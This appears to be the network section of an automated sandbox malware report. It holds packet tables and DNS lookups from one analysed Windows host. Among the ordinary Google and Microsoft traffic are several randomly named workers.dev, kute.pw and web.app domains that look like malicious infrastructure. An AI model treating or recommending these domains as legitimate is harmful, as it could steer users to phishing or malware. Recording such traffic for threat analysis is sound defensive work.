May 27, 2024 00:46:23.199588060 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:23.199656010 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:23.200474024 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:23.200508118 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:23.359678030 CEST	49672	443	192.168.2.6	173.222.162.64
May 27, 2024 00:46:23.687812090 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:23.688083887 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:23.688150883 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:23.689354897 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:23.689749002 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:23.689749956 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:23.689790010 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:23.689985991 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:23.735615015 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.043644905 CEST	49714	443	192.168.2.6	23.211.8.90
May 27, 2024 00:46:24.043693066 CEST	443	49714	23.211.8.90	192.168.2.6
May 27, 2024 00:46:24.043979883 CEST	49714	443	192.168.2.6	23.211.8.90
May 27, 2024 00:46:24.046274900 CEST	49714	443	192.168.2.6	23.211.8.90
May 27, 2024 00:46:24.046323061 CEST	443	49714	23.211.8.90	192.168.2.6
May 27, 2024 00:46:24.071654081 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.073486090 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.073971033 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.074007988 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.076205969 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.077403069 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.077420950 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.078913927 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.079042912 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.079190969 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.079205990 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.079282045 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.081429005 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.085113049 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.085383892 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.085396051 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.089689970 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.089983940 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.089997053 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.143203020 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.143238068 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.165430069 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.165477037 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.165533066 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.165572882 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.165601969 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.166280031 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.169121981 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.169524908 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.169538021 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.171614885 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.173312902 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.173325062 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.174107075 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.175754070 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.175765991 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.187520981 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.187530994 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.187639952 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.187654972 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.187676907 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.187695980 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.187719107 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.187751055 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.187751055 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.187752008 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.187776089 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.187824965 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.236615896 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.283489943 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.283500910 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.283677101 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.283703089 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.283729076 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.283770084 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.283801079 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.283801079 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.284945011 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.314162970 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.314184904 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.314368963 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.314384937 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.314749002 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.346049070 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.346072912 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.346246004 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.346266031 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.346666098 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.674546003 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.674566031 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.674626112 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.674654961 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.674712896 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.717116117 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.717139006 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.717194080 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.717238903 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.717272997 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.717293978 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.736777067 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.736809969 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.736871958 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.736887932 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.736941099 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.763060093 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.763091087 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.763134003 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.763159037 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.763185978 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.763211966 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.766791105 CEST	443	49714	23.211.8.90	192.168.2.6
May 27, 2024 00:46:24.766870022 CEST	49714	443	192.168.2.6	23.211.8.90
May 27, 2024 00:46:24.770165920 CEST	49714	443	192.168.2.6	23.211.8.90
May 27, 2024 00:46:24.770181894 CEST	443	49714	23.211.8.90	192.168.2.6
May 27, 2024 00:46:24.770452023 CEST	443	49714	23.211.8.90	192.168.2.6
May 27, 2024 00:46:24.782730103 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.782753944 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.782794952 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.782812119 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.782839060 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.782869101 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.799063921 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.799125910 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.799141884 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.799197912 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.808006048 CEST	49714	443	192.168.2.6	23.211.8.90
May 27, 2024 00:46:24.818773031 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.818797112 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.818839073 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.818850994 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.818876982 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.838354111 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.838378906 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.838418007 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.838435888 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.838463068 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.850537062 CEST	443	49714	23.211.8.90	192.168.2.6
May 27, 2024 00:46:24.858021021 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.858042955 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.858083963 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.858105898 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.858140945 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.877662897 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.877687931 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.877729893 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.877752066 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.877784014 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.900685072 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.900706053 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.900744915 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.900767088 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.900798082 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.920429945 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.920454979 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.920511961 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.920528889 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.920568943 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.930382013 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:24.930448055 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.930512905 CEST	49713	443	192.168.2.6	199.36.158.100
May 27, 2024 00:46:24.930541039 CEST	443	49713	199.36.158.100	192.168.2.6
May 27, 2024 00:46:25.017682076 CEST	49706	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:25.026177883 CEST	443	49714	23.211.8.90	192.168.2.6
May 27, 2024 00:46:25.026247025 CEST	443	49714	23.211.8.90	192.168.2.6
May 27, 2024 00:46:25.026294947 CEST	49714	443	192.168.2.6	23.211.8.90
May 27, 2024 00:46:25.027939081 CEST	49714	443	192.168.2.6	23.211.8.90
May 27, 2024 00:46:25.027956963 CEST	443	49714	23.211.8.90	192.168.2.6
May 27, 2024 00:46:25.027990103 CEST	49714	443	192.168.2.6	23.211.8.90
May 27, 2024 00:46:25.027997971 CEST	443	49714	23.211.8.90	192.168.2.6
May 27, 2024 00:46:25.030869007 CEST	443	49698	173.222.162.64	192.168.2.6
May 27, 2024 00:46:25.030946970 CEST	49698	443	192.168.2.6	173.222.162.64
May 27, 2024 00:46:25.062495947 CEST	443	49706	188.114.97.3	192.168.2.6
May 27, 2024 00:46:25.070259094 CEST	49715	443	192.168.2.6	23.211.8.90
May 27, 2024 00:46:25.070291996 CEST	443	49715	23.211.8.90	192.168.2.6
May 27, 2024 00:46:25.070350885 CEST	49715	443	192.168.2.6	23.211.8.90
May 27, 2024 00:46:25.071018934 CEST	49715	443	192.168.2.6	23.211.8.90
May 27, 2024 00:46:25.071038008 CEST	443	49715	23.211.8.90	192.168.2.6
May 27, 2024 00:46:25.135166883 CEST	443	49706	188.114.97.3	192.168.2.6
May 27, 2024 00:46:25.138144016 CEST	443	49706	188.114.97.3	192.168.2.6
May 27, 2024 00:46:25.138192892 CEST	49706	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:25.138232946 CEST	443	49706	188.114.97.3	192.168.2.6
May 27, 2024 00:46:25.139517069 CEST	443	49706	188.114.97.3	192.168.2.6
May 27, 2024 00:46:25.139573097 CEST	443	49706	188.114.97.3	192.168.2.6
May 27, 2024 00:46:25.139574051 CEST	49706	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:25.139617920 CEST	49706	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:25.140366077 CEST	49706	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:25.140384912 CEST	443	49706	188.114.97.3	192.168.2.6
May 27, 2024 00:46:25.206094980 CEST	49716	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:25.206130028 CEST	443	49716	188.114.97.3	192.168.2.6
May 27, 2024 00:46:25.206201077 CEST	49716	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:25.206749916 CEST	49716	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:25.206765890 CEST	443	49716	188.114.97.3	192.168.2.6
May 27, 2024 00:46:25.734239101 CEST	443	49716	188.114.97.3	192.168.2.6
May 27, 2024 00:46:25.734914064 CEST	49716	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:25.734930992 CEST	443	49716	188.114.97.3	192.168.2.6
May 27, 2024 00:46:25.735790968 CEST	443	49716	188.114.97.3	192.168.2.6
May 27, 2024 00:46:25.735930920 CEST	49716	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:25.736495972 CEST	49716	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:25.736546993 CEST	443	49716	188.114.97.3	192.168.2.6
May 27, 2024 00:46:25.736598969 CEST	49716	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:25.742094040 CEST	443	49715	23.211.8.90	192.168.2.6
May 27, 2024 00:46:25.742211103 CEST	49715	443	192.168.2.6	23.211.8.90
May 27, 2024 00:46:25.743947029 CEST	49715	443	192.168.2.6	23.211.8.90
May 27, 2024 00:46:25.743973970 CEST	443	49715	23.211.8.90	192.168.2.6
May 27, 2024 00:46:25.744345903 CEST	443	49715	23.211.8.90	192.168.2.6
May 27, 2024 00:46:25.745975971 CEST	49715	443	192.168.2.6	23.211.8.90
May 27, 2024 00:46:25.779047012 CEST	49716	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:25.779067039 CEST	443	49716	188.114.97.3	192.168.2.6
May 27, 2024 00:46:25.790504932 CEST	443	49715	23.211.8.90	192.168.2.6
May 27, 2024 00:46:25.828870058 CEST	49716	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:25.870769978 CEST	443	49716	188.114.97.3	192.168.2.6
May 27, 2024 00:46:25.870805025 CEST	443	49716	188.114.97.3	192.168.2.6
May 27, 2024 00:46:25.871010065 CEST	49716	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:25.871015072 CEST	443	49716	188.114.97.3	192.168.2.6
May 27, 2024 00:46:25.874023914 CEST	443	49716	188.114.97.3	192.168.2.6
May 27, 2024 00:46:25.874075890 CEST	443	49716	188.114.97.3	192.168.2.6
May 27, 2024 00:46:25.874479055 CEST	49716	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:25.874479055 CEST	49716	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:25.997013092 CEST	443	49715	23.211.8.90	192.168.2.6
May 27, 2024 00:46:25.997149944 CEST	443	49715	23.211.8.90	192.168.2.6
May 27, 2024 00:46:25.997261047 CEST	49715	443	192.168.2.6	23.211.8.90
May 27, 2024 00:46:25.997823000 CEST	49715	443	192.168.2.6	23.211.8.90
May 27, 2024 00:46:25.997847080 CEST	443	49715	23.211.8.90	192.168.2.6
May 27, 2024 00:46:25.997879028 CEST	49715	443	192.168.2.6	23.211.8.90
May 27, 2024 00:46:25.997886896 CEST	443	49715	23.211.8.90	192.168.2.6
May 27, 2024 00:46:26.185514927 CEST	49716	443	192.168.2.6	188.114.97.3
May 27, 2024 00:46:26.185532093 CEST	443	49716	188.114.97.3	192.168.2.6
May 27, 2024 00:46:32.210640907 CEST	443	49709	142.250.186.100	192.168.2.6
May 27, 2024 00:46:32.210709095 CEST	443	49709	142.250.186.100	192.168.2.6
May 27, 2024 00:46:32.210865021 CEST	49709	443	192.168.2.6	142.250.186.100
May 27, 2024 00:46:33.616333961 CEST	49709	443	192.168.2.6	142.250.186.100
May 27, 2024 00:46:33.616369963 CEST	443	49709	142.250.186.100	192.168.2.6
May 27, 2024 00:46:37.081832886 CEST	443	49711	104.21.50.211	192.168.2.6
May 27, 2024 00:46:37.081998110 CEST	443	49711	104.21.50.211	192.168.2.6
May 27, 2024 00:46:37.082046986 CEST	49711	443	192.168.2.6	104.21.50.211
May 27, 2024 00:46:37.583071947 CEST	49711	443	192.168.2.6	104.21.50.211
May 27, 2024 00:46:37.583141088 CEST	443	49711	104.21.50.211	192.168.2.6
May 27, 2024 00:47:21.658900023 CEST	49726	443	192.168.2.6	142.250.186.100
May 27, 2024 00:47:21.658987999 CEST	443	49726	142.250.186.100	192.168.2.6
May 27, 2024 00:47:21.659091949 CEST	49726	443	192.168.2.6	142.250.186.100
May 27, 2024 00:47:21.659888029 CEST	49726	443	192.168.2.6	142.250.186.100
May 27, 2024 00:47:21.659921885 CEST	443	49726	142.250.186.100	192.168.2.6
May 27, 2024 00:47:22.313903093 CEST	443	49726	142.250.186.100	192.168.2.6
May 27, 2024 00:47:22.314188957 CEST	49726	443	192.168.2.6	142.250.186.100
May 27, 2024 00:47:22.314228058 CEST	443	49726	142.250.186.100	192.168.2.6
May 27, 2024 00:47:22.314712048 CEST	443	49726	142.250.186.100	192.168.2.6
May 27, 2024 00:47:22.314997911 CEST	49726	443	192.168.2.6	142.250.186.100
May 27, 2024 00:47:22.315090895 CEST	443	49726	142.250.186.100	192.168.2.6
May 27, 2024 00:47:22.357280016 CEST	49726	443	192.168.2.6	142.250.186.100
May 27, 2024 00:47:32.217940092 CEST	443	49726	142.250.186.100	192.168.2.6
May 27, 2024 00:47:32.217998028 CEST	443	49726	142.250.186.100	192.168.2.6
May 27, 2024 00:47:32.218060970 CEST	49726	443	192.168.2.6	142.250.186.100
May 27, 2024 00:47:33.582176924 CEST	49726	443	192.168.2.6	142.250.186.100
May 27, 2024 00:47:33.582252979 CEST	443	49726	142.250.186.100	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 27, 2024 00:46:19.389053106 CEST	53	64521	1.1.1.1	192.168.2.6
May 27, 2024 00:46:19.389066935 CEST	53	57089	1.1.1.1	192.168.2.6
May 27, 2024 00:46:20.547327042 CEST	53	64955	1.1.1.1	192.168.2.6
May 27, 2024 00:46:20.840490103 CEST	61787	53	192.168.2.6	1.1.1.1
May 27, 2024 00:46:20.840622902 CEST	49228	53	192.168.2.6	1.1.1.1
May 27, 2024 00:46:20.854655027 CEST	53	61787	1.1.1.1	192.168.2.6
May 27, 2024 00:46:20.854692936 CEST	53	49228	1.1.1.1	192.168.2.6
May 27, 2024 00:46:21.541172028 CEST	60503	53	192.168.2.6	1.1.1.1
May 27, 2024 00:46:21.541304111 CEST	60444	53	192.168.2.6	1.1.1.1
May 27, 2024 00:46:21.597733021 CEST	53	60503	1.1.1.1	192.168.2.6
May 27, 2024 00:46:21.597762108 CEST	53	60444	1.1.1.1	192.168.2.6
May 27, 2024 00:46:21.607939005 CEST	54801	53	192.168.2.6	1.1.1.1
May 27, 2024 00:46:21.608253002 CEST	56829	53	192.168.2.6	1.1.1.1
May 27, 2024 00:46:21.622019053 CEST	53	56829	1.1.1.1	192.168.2.6
May 27, 2024 00:46:21.622055054 CEST	53	54801	1.1.1.1	192.168.2.6
May 27, 2024 00:46:22.266675949 CEST	52422	53	192.168.2.6	1.1.1.1
May 27, 2024 00:46:22.267157078 CEST	51160	53	192.168.2.6	1.1.1.1
May 27, 2024 00:46:22.347373009 CEST	53	52422	1.1.1.1	192.168.2.6
May 27, 2024 00:46:22.347387075 CEST	53	51160	1.1.1.1	192.168.2.6
May 27, 2024 00:46:25.147805929 CEST	57664	53	192.168.2.6	1.1.1.1
May 27, 2024 00:46:25.148065090 CEST	61847	53	192.168.2.6	1.1.1.1
May 27, 2024 00:46:25.204765081 CEST	53	57664	1.1.1.1	192.168.2.6
May 27, 2024 00:46:25.204799891 CEST	53	61847	1.1.1.1	192.168.2.6
May 27, 2024 00:46:37.676094055 CEST	53	64296	1.1.1.1	192.168.2.6
May 27, 2024 00:46:56.747330904 CEST	53	63145	1.1.1.1	192.168.2.6
May 27, 2024 00:47:18.873641968 CEST	53	64013	1.1.1.1	192.168.2.6
May 27, 2024 00:47:19.350600958 CEST	53	56827	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 27, 2024 00:46:20.840490103 CEST	192.168.2.6	1.1.1.1	0x1c2b	Standard query (0)	fanondiekoxzijds.jamesona8.workers.dev	A (IP address)	IN (0x0001)	false
May 27, 2024 00:46:20.840622902 CEST	192.168.2.6	1.1.1.1	0xa898	Standard query (0)	fanondiekoxzijds.jamesona8.workers.dev	65	IN (0x0001)	false
May 27, 2024 00:46:21.541172028 CEST	192.168.2.6	1.1.1.1	0x7006	Standard query (0)	xjdcawrhzgcobuvuimlzladxi.kute.pw	A (IP address)	IN (0x0001)	false
May 27, 2024 00:46:21.541304111 CEST	192.168.2.6	1.1.1.1	0xb478	Standard query (0)	xjdcawrhzgcobuvuimlzladxi.kute.pw	65	IN (0x0001)	false
May 27, 2024 00:46:21.607939005 CEST	192.168.2.6	1.1.1.1	0x1270	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
May 27, 2024 00:46:21.608253002 CEST	192.168.2.6	1.1.1.1	0xe0fa	Standard query (0)	www.google.com	65	IN (0x0001)	false
May 27, 2024 00:46:22.266675949 CEST	192.168.2.6	1.1.1.1	0x1d76	Standard query (0)	rullbullpullpushcndapp.web.app	A (IP address)	IN (0x0001)	false
May 27, 2024 00:46:22.267157078 CEST	192.168.2.6	1.1.1.1	0xdba3	Standard query (0)	rullbullpullpushcndapp.web.app	65	IN (0x0001)	false
May 27, 2024 00:46:25.147805929 CEST	192.168.2.6	1.1.1.1	0xe967	Standard query (0)	fanondiekoxzijds.jamesona8.workers.dev	A (IP address)	IN (0x0001)	false
May 27, 2024 00:46:25.148065090 CEST	192.168.2.6	1.1.1.1	0xe1e2	Standard query (0)	fanondiekoxzijds.jamesona8.workers.dev	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 27, 2024 00:46:20.854655027 CEST	1.1.1.1	192.168.2.6	0x1c2b	No error (0)	fanondiekoxzijds.jamesona8.workers.dev		188.114.97.3	A (IP address)	IN (0x0001)	false
May 27, 2024 00:46:20.854655027 CEST	1.1.1.1	192.168.2.6	0x1c2b	No error (0)	fanondiekoxzijds.jamesona8.workers.dev		188.114.96.3	A (IP address)	IN (0x0001)	false
May 27, 2024 00:46:20.854692936 CEST	1.1.1.1	192.168.2.6	0xa898	No error (0)	fanondiekoxzijds.jamesona8.workers.dev			65	IN (0x0001)	false
May 27, 2024 00:46:21.597733021 CEST	1.1.1.1	192.168.2.6	0x7006	No error (0)	xjdcawrhzgcobuvuimlzladxi.kute.pw		104.21.50.211	A (IP address)	IN (0x0001)	false
May 27, 2024 00:46:21.597733021 CEST	1.1.1.1	192.168.2.6	0x7006	No error (0)	xjdcawrhzgcobuvuimlzladxi.kute.pw		172.67.167.114	A (IP address)	IN (0x0001)	false
May 27, 2024 00:46:21.597762108 CEST	1.1.1.1	192.168.2.6	0xb478	No error (0)	xjdcawrhzgcobuvuimlzladxi.kute.pw			65	IN (0x0001)	false
May 27, 2024 00:46:21.622019053 CEST	1.1.1.1	192.168.2.6	0xe0fa	No error (0)	www.google.com			65	IN (0x0001)	false
May 27, 2024 00:46:21.622055054 CEST	1.1.1.1	192.168.2.6	0x1270	No error (0)	www.google.com		142.250.186.100	A (IP address)	IN (0x0001)	false
May 27, 2024 00:46:22.347373009 CEST	1.1.1.1	192.168.2.6	0x1d76	No error (0)	rullbullpullpushcndapp.web.app		199.36.158.100	A (IP address)	IN (0x0001)	false
May 27, 2024 00:46:25.204765081 CEST	1.1.1.1	192.168.2.6	0xe967	No error (0)	fanondiekoxzijds.jamesona8.workers.dev		188.114.97.3	A (IP address)	IN (0x0001)	false
May 27, 2024 00:46:25.204765081 CEST	1.1.1.1	192.168.2.6	0xe967	No error (0)	fanondiekoxzijds.jamesona8.workers.dev		188.114.96.3	A (IP address)	IN (0x0001)	false
May 27, 2024 00:46:25.204799891 CEST	1.1.1.1	192.168.2.6	0xe1e2	No error (0)	fanondiekoxzijds.jamesona8.workers.dev			65	IN (0x0001)	false
May 27, 2024 00:46:34.350157976 CEST	1.1.1.1	192.168.2.6	0x9756	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
May 27, 2024 00:46:34.350157976 CEST	1.1.1.1	192.168.2.6	0x9756	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
May 27, 2024 00:46:35.259213924 CEST	1.1.1.1	192.168.2.6	0xf278	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
May 27, 2024 00:46:35.259213924 CEST	1.1.1.1	192.168.2.6	0xf278	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
May 27, 2024 00:46:49.383626938 CEST	1.1.1.1	192.168.2.6	0x304c	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
May 27, 2024 00:46:49.383626938 CEST	1.1.1.1	192.168.2.6	0x304c	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
May 27, 2024 00:47:11.792021990 CEST	1.1.1.1	192.168.2.6	0x4023	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
May 27, 2024 00:47:11.792021990 CEST	1.1.1.1	192.168.2.6	0x4023	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
